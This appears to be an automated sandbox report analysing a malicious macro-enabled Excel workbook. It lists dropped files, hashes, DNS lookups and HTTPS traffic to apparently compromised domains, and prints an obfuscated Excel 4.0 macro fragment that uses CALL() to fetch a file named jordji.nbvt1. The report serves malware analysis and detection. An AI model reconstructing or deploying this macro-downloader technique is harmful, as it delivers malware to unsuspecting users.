                                                                                    Preview: 0..T...*.H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........|h....210303062855Z0...+......0..D.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Tue May 4 19:49:42 2021, atime=Tue May 4 19:49:42 2021, length=12288, window=hide
                                                                                    Category:dropped
                                                                                    Size (bytes):867
                                                                                    Entropy (8bit):4.471543208289185
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:85Qnkyky3LgXg/XAlCPCHaXtB8XzB/ubX+WnicvbG+bDtZ3YilMMEpxRljKbTdJU:85p36/XTd6jEYevDv3qKrNru/
                                                                                    MD5:78AC3EEEFBEFEE85D7E9A6A99395C64C
                                                                                    SHA1:B715602FB81AF314AB7664DC80AF4A9A164516C3
                                                                                    SHA-256:86600F0DA68F65521F9A0F9ABCAFE52549E0D1E4398C7070BDAA4745C62D4FE3
                                                                                    SHA-512:3F171459F60EA759BB7EBD13102D0E84131BE1579B254767F6DA30F5EC252AECEFB925D8098B130C4C2CDAE70F3B009C0F331DBB30832298108504364B6F842D
                                                                                    Malicious:false
                                                                                    Preview: L..................F...........7G..tW;.'A..tW;.'A...0......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R6...Desktop.d......QK.X.R6.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\216041\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......216041..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):115
                                                                                    Entropy (8bit):4.494767934221362
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:oyBVomxWdachXpSOytchXpSmxWdachXpSv:djuaUpytUpQaUpc
                                                                                    MD5:FA0A33D399C02FC598EC4632F340494F
                                                                                    SHA1:5F94ABDC6C4B12636D5C8F3BF1865694CDB06923
                                                                                    SHA-256:098801A50A26DA0D9D4F90A0C18247EB2D0DF5EB66A1BF4EAD24C913CEFCA1B3
                                                                                    SHA-512:2897EFEFE704E57E6B1FEDDE4CC19F163D41E859F800CDF1C1DFEDB0F0284CBD89B9C7CAFEC7090A578E26E0DE7E3C2FCC580ADDF0E7951779D8CE39A4E2D602
                                                                                    Malicious:false
                                                                                    Preview: Desktop.LNK=0..[misc]..statistic-2067311372.LNK=0..statistic-2067311372.LNK=0..[misc]..statistic-2067311372.LNK=0..
                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\statistic-2067311372.LNK
                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Tue May 4 19:49:42 2021, atime=Tue May 4 19:49:42 2021, length=109077, window=hide
                                                                                    Category:dropped
                                                                                    Size (bytes):2138
                                                                                    Entropy (8bit):4.5299242093547605
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:8s/XT0jF32Ehu4bKQh2s/XT0jF32Ehu4bKQ/:8s/XojF32d4bKQh2s/XojF32d4bKQ/
                                                                                    MD5:AB3842535F6C0CEB6514052E03213061
                                                                                    SHA1:701CA01F87C93E6AF717BD9DFE168102E4DEB327
                                                                                    SHA-256:088F0DFAE947F373119C8F4199BE99715CBB4CCD047C9942613729B6FE07EBAA
                                                                                    SHA-512:2705603F6C0AE1D4715078424869797F9B7106E41F689BF8BE03CEE0B0AD8E48A76340377FC9673DD93AB2B1F500C34B307A0E4EAF3AB2822FBF466DBC39EEB4
                                                                                    Malicious:false
                                                                                    Preview: L..................F.... ......{..tW;.'A....I.'A...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....|.2......R1. .STATIS~1.XLS..`.......Q.y.Q.y*...8.....................s.t.a.t.i.s.t.i.c.-.2.0.6.7.3.1.1.3.7.2...x.l.s.m.......................-...8...[............?J......C:\Users\..#...................\\216041\Users.user\Desktop\statistic-2067311372.xlsm.0.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.s.t.a.t.i.s.t.i.c.-.2.0.6.7.3.1.1.3.7.2...x.l.s.m.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......216041.........
                                                                                    C:\Users\user\Desktop\A0EE0000
                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):109077
                                                                                    Entropy (8bit):7.916954833344646
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:oeuov3BiTr4GDgM+1M92hjPcQpWUot9ENPcNcrAOJOerwzkFBHhr6vQnf+zyyfZD:oeuocrZD2MopH8x+FHdoLqp6vif+zbl
                                                                                    MD5:520DFA3FCAA0EB5150D431FD0A7BD0C9
                                                                                    SHA1:D74FBF464CBA7779A4289F6E0BC4717BEE201189
                                                                                    SHA-256:7A25221090E8C732FFF6D20897E838B0F11160DD223C8B7CD8B0DBC80AD25054
                                                                                    SHA-512:A92F840135F9AA8218E502E9ED48B8A18706AF0DCCA0AA52F23DE374AC69533D4BF474F67423B9E61049420B320DCE8763AE2E5C98F8DC96D270CF6BE347724A
                                                                                    Malicious:false
                                                                                    Preview: .U.n.0....?..........C....I?.&..a..e.....5..Jr........jcM....w-.hf..'..k.....0.....Z..dW......XQ...).....l|.G3+..H..;..\....l..K...T.......&U....)Yj....2U.D.FK.H(.r.......|...`. ....&DM...R....u...f.y.xE...%#2....,.`..~!.^a.3..0.....ZAu'b.......}\/._7.A...k.H0Mq..BF........^..`*........7........E. .V.-f.....2.n:.h.]].a..J.../...c..........-...c.E.u.(...../.....s......>.....> .q...$Y....AL..Yv,)..........a.@....pZ........PK..........!.t...............[Content_Types].xml ...(..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    C:\Users\user\Desktop\~$statistic-2067311372.xlsm
                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):330
                                                                                    Entropy (8bit):1.4377382811115937
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                                    MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                                    SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                                    SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                                    SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                                    Malicious:true
                                                                                    Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                    C:\Users\user\jordji.nbvt11
                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                    File Type:HTML document, ASCII text
                                                                                    Category:dropped
                                                                                    Size (bytes):494
                                                                                    Entropy (8bit):4.962239405540505
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:hnMQbwzRQ6QclfhxxEdWr+YZrH3atJMlgOt0quoQL:hMxRQspxCQnZrH3atEx0h
                                                                                    MD5:0357AA49EA850B11B99D09A2479C321B
                                                                                    SHA1:41472BA5C40F61FA1C77C42CF06248F13B8785F0
                                                                                    SHA-256:0FF0B7FCB090C65D0BDCB2AF4BBD2C30F33356B3CE9B117186FA20391EF840A3
                                                                                    SHA-512:A317A0F035B8DFF7CA60C76B0B75698A3528FD4C7C5E915292C982D2B38C1C937C318362C891E93BEE6FDB1B166764D7183140A837FD23DAA2BE3D2DAC5A5DFC
                                                                                    Malicious:false
                                                                                    Preview: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">.<html>. <head>. <title>Contact Support</title>. <meta http-equiv="Content-Type" content="text/html; charset=utf-8">. </head>. <body marginwidth="0" marginheight="0" leftmargin="0" topmargin="0">. <iframe width="100%" height="100%" frameborder="0" SCROLLING="auto" marginwidth="0" src="http://fwdssp.com/?dn=referer_detect&pid=5POL4F2O4"></iframe>. </body>.</html>.

                                                                                    Static File Info

                                                                                    General

                                                                                    File type:Microsoft Excel 2007+
                                                                                    Entropy (8bit):7.917049261986743
                                                                                    TrID:
                                                                                    • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
                                                                                    • ZIP compressed archive (8000/1) 16.67%
                                                                                    File name:statistic-2067311372.xlsm
                                                                                    File size:109084
                                                                                    MD5:894169c41e45975fa36c36c031628f52
                                                                                    SHA1:3ad2f1b52fca973252dfba03610bf1def0c37e3c
                                                                                    SHA256:69a97d83771cb6cb1583fbf95e5fb9ada26f1ee6257351ecf24b9b4e9e4d80d4
                                                                                    SHA512:604e1cc0560400d17b35782c1b942332dd1c428fce24dbb5f62ab37f00594693e0ffb87b7a50749482bdba75cd0422602a3f93a8bb5e80150a3605086f34e478
                                                                                    SSDEEP:1536:iutuov3BiTr4GDgM+nG92hjPcQpWUot9E8cNcrAOJOerwzkFBHhr6vQnf+zy7fc:ikuocrZDKGopH8x+8HdoLqp6vif+zUk
                                                                                    File Content Preview:PK..........!.t...............[Content_Types].xml ...(............................................................................................................................................##...........................................................

                                                                                    File Icon

                                                                                    Icon Hash:e4e2aa8aa4bcbcac

                                                                                    Static OLE Info

                                                                                    General

                                                                                    Document Type:OpenXML
                                                                                    Number of OLE Files:1

                                                                                    OLE File "statistic-2067311372.xlsm"

                                                                                    Indicators

                                                                                    Has Summary Info:
                                                                                    Application Name:
                                                                                    Encrypted Document:
                                                                                    Contains Word Document Stream:
                                                                                    Contains Workbook/Book Stream:
                                                                                    Contains PowerPoint Document Stream:
                                                                                    Contains Visio Document Stream:
                                                                                    Contains ObjectPool Stream:
                                                                                    Flash Objects Count:
                                                                                    Contains VBA Macros:

                                                                                    Macro 4.0 Code

                                                                                    ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
                                                                                    ,,,=HALT(),,,,,,,,,,,,"=4984654+9846544+468464=CALL(Sheet2!AY107&""n"",Sheet2!AY108&""A"",Sheet2!AY118,before.3.21.42.sheet!AR49,Sheet2!AT114,before.3.21.42.sheet!AT39,0,0)=CALL(Sheet2!AY107&""n"",Sheet2!AY108&""A"",Sheet2!AY118,before.3.21.42.sheet!AR49,Sheet2!AT115,before.3.21.42.sheet!AT39&""1"",0,0)",,,,,,,,,,,,,,,=Sheet2!AW142(),,,,,,,,,,,,,,,,,,,,,U,J,",D",..\jordji.nbvt1R,J,l,L,C,l,D,C,R,o,B,e,w,B,g,n,,i,l,,s,o,,t,a,,e,d,0,r,T,,S,o,,e,F,,r,i,,ve,l,,r,e,,,

                                                                                    Network Behavior

                                                                                    Network Port Distribution

                                                                                    TCP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    May 4, 2021 13:49:38.018219948 CEST49165443192.168.2.22192.254.233.89
                                                                                    May 4, 2021 13:49:38.204818010 CEST44349165192.254.233.89192.168.2.22
                                                                                    May 4, 2021 13:49:38.204930067 CEST49165443192.168.2.22192.254.233.89
                                                                                    May 4, 2021 13:49:38.218786955 CEST49165443192.168.2.22192.254.233.89
                                                                                    May 4, 2021 13:49:38.403544903 CEST44349165192.254.233.89192.168.2.22
                                                                                    May 4, 2021 13:49:38.410284996 CEST44349165192.254.233.89192.168.2.22
                                                                                    May 4, 2021 13:49:38.410320044 CEST44349165192.254.233.89192.168.2.22
                                                                                    May 4, 2021 13:49:38.410356045 CEST44349165192.254.233.89192.168.2.22
                                                                                    May 4, 2021 13:49:38.410470009 CEST49165443192.168.2.22192.254.233.89
                                                                                    May 4, 2021 13:49:38.464744091 CEST49165443192.168.2.22192.254.233.89
                                                                                    May 4, 2021 13:49:38.655004978 CEST44349165192.254.233.89192.168.2.22
                                                                                    May 4, 2021 13:49:38.655155897 CEST49165443192.168.2.22192.254.233.89
                                                                                    May 4, 2021 13:49:40.320177078 CEST49165443192.168.2.22192.254.233.89
                                                                                    May 4, 2021 13:49:40.545079947 CEST44349165192.254.233.89192.168.2.22
                                                                                    May 4, 2021 13:49:40.875216961 CEST44349165192.254.233.89192.168.2.22
                                                                                    May 4, 2021 13:49:40.875394106 CEST49165443192.168.2.22192.254.233.89
                                                                                    May 4, 2021 13:49:40.876163960 CEST44349165192.254.233.89192.168.2.22
                                                                                    May 4, 2021 13:49:40.876254082 CEST49165443192.168.2.22192.254.233.89
                                                                                    May 4, 2021 13:49:40.941540956 CEST49168443192.168.2.22192.185.5.2
                                                                                    May 4, 2021 13:49:41.103374958 CEST44349168192.185.5.2192.168.2.22
                                                                                    May 4, 2021 13:49:41.103563070 CEST49168443192.168.2.22192.185.5.2
                                                                                    May 4, 2021 13:49:41.104643106 CEST49168443192.168.2.22192.185.5.2
                                                                                    May 4, 2021 13:49:41.266127110 CEST44349168192.185.5.2192.168.2.22
                                                                                    May 4, 2021 13:49:41.279258013 CEST44349168192.185.5.2192.168.2.22
                                                                                    May 4, 2021 13:49:41.279293060 CEST44349168192.185.5.2192.168.2.22
                                                                                    May 4, 2021 13:49:41.279311895 CEST44349168192.185.5.2192.168.2.22
                                                                                    May 4, 2021 13:49:41.279443026 CEST49168443192.168.2.22192.185.5.2
                                                                                    May 4, 2021 13:49:41.319683075 CEST49168443192.168.2.22192.185.5.2
                                                                                    May 4, 2021 13:49:41.491117001 CEST44349168192.185.5.2192.168.2.22
                                                                                    May 4, 2021 13:49:41.491329908 CEST49168443192.168.2.22192.185.5.2
                                                                                    May 4, 2021 13:49:41.530486107 CEST49168443192.168.2.22192.185.5.2
                                                                                    May 4, 2021 13:49:41.710499048 CEST44349168192.185.5.2192.168.2.22
                                                                                    May 4, 2021 13:49:41.710581064 CEST49168443192.168.2.22192.185.5.2
                                                                                    May 4, 2021 13:49:41.710635900 CEST44349168192.185.5.2192.168.2.22
                                                                                    May 4, 2021 13:49:41.710685015 CEST49168443192.168.2.22192.185.5.2
                                                                                    May 4, 2021 13:49:41.711136103 CEST49168443192.168.2.22192.185.5.2
                                                                                    May 4, 2021 13:49:41.713047981 CEST49169443192.168.2.22192.185.5.2
                                                                                    May 4, 2021 13:49:41.871856928 CEST44349169192.185.5.2192.168.2.22
                                                                                    May 4, 2021 13:49:41.872030020 CEST49169443192.168.2.22192.185.5.2
                                                                                    May 4, 2021 13:49:41.872551918 CEST44349168192.185.5.2192.168.2.22
                                                                                    May 4, 2021 13:49:41.872657061 CEST49169443192.168.2.22192.185.5.2
                                                                                    May 4, 2021 13:49:42.031402111 CEST44349169192.185.5.2192.168.2.22
                                                                                    May 4, 2021 13:49:42.092343092 CEST44349169192.185.5.2192.168.2.22
                                                                                    May 4, 2021 13:49:42.092534065 CEST49169443192.168.2.22192.185.5.2
                                                                                    May 4, 2021 13:49:42.093055964 CEST49169443192.168.2.22192.185.5.2
                                                                                    May 4, 2021 13:49:42.124530077 CEST49169443192.168.2.22192.185.5.2
                                                                                    May 4, 2021 13:49:42.251837969 CEST44349169192.185.5.2192.168.2.22
                                                                                    May 4, 2021 13:49:42.283762932 CEST44349169192.185.5.2192.168.2.22
                                                                                    May 4, 2021 13:49:42.396389008 CEST44349169192.185.5.2192.168.2.22
                                                                                    May 4, 2021 13:49:42.396457911 CEST44349169192.185.5.2192.168.2.22
                                                                                    May 4, 2021 13:49:42.396579027 CEST49169443192.168.2.22192.185.5.2
                                                                                    May 4, 2021 13:49:42.397042036 CEST49169443192.168.2.22192.185.5.2
                                                                                    May 4, 2021 13:49:42.555675030 CEST44349169192.185.5.2192.168.2.22
                                                                                    May 4, 2021 13:50:10.876177073 CEST44349165192.254.233.89192.168.2.22

                                                                                    UDP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    May 4, 2021 13:49:37.943892956 CEST5219753192.168.2.228.8.8.8
                                                                                    May 4, 2021 13:49:38.000962973 CEST53521978.8.8.8192.168.2.22
                                                                                    May 4, 2021 13:49:38.986424923 CEST5309953192.168.2.228.8.8.8
                                                                                    May 4, 2021 13:49:39.035417080 CEST53530998.8.8.8192.168.2.22
                                                                                    May 4, 2021 13:49:39.042653084 CEST5283853192.168.2.228.8.8.8
                                                                                    May 4, 2021 13:49:39.094059944 CEST53528388.8.8.8192.168.2.22
                                                                                    May 4, 2021 13:49:39.655258894 CEST6120053192.168.2.228.8.8.8
                                                                                    May 4, 2021 13:49:39.703845024 CEST53612008.8.8.8192.168.2.22
                                                                                    May 4, 2021 13:49:39.713066101 CEST4954853192.168.2.228.8.8.8
                                                                                    May 4, 2021 13:49:39.772975922 CEST53495488.8.8.8192.168.2.22
                                                                                    May 4, 2021 13:49:40.890054941 CEST5562753192.168.2.228.8.8.8
                                                                                    May 4, 2021 13:49:40.939656973 CEST53556278.8.8.8192.168.2.22

                                                                                    DNS Queries

                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                    May 4, 2021 13:49:37.943892956 CEST192.168.2.228.8.8.80xfda2Standard query (0)industrialarttextile.comA (IP address)IN (0x0001)
                                                                                    May 4, 2021 13:49:40.890054941 CEST192.168.2.228.8.8.80xd5c0Standard query (0)anaheimdermatologists.comA (IP address)IN (0x0001)

                                                                                    DNS Answers

                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                    May 4, 2021 13:49:38.000962973 CEST8.8.8.8192.168.2.220xfda2No error (0)industrialarttextile.com192.254.233.89A (IP address)IN (0x0001)
                                                                                    May 4, 2021 13:49:40.939656973 CEST8.8.8.8192.168.2.220xd5c0No error (0)anaheimdermatologists.com192.185.5.2A (IP address)IN (0x0001)

                                                                                    HTTPS Packets

                                                                                    TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                    May 4, 2021 13:49:38.410356045 CEST192.254.233.89443192.168.2.2249165CN=mail.gdmart.com.bd CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Wed Mar 10 10:47:11 CET 2021 Wed Oct 07 21:21:40 CEST 2020Tue Jun 08 11:47:11 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                                                    CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
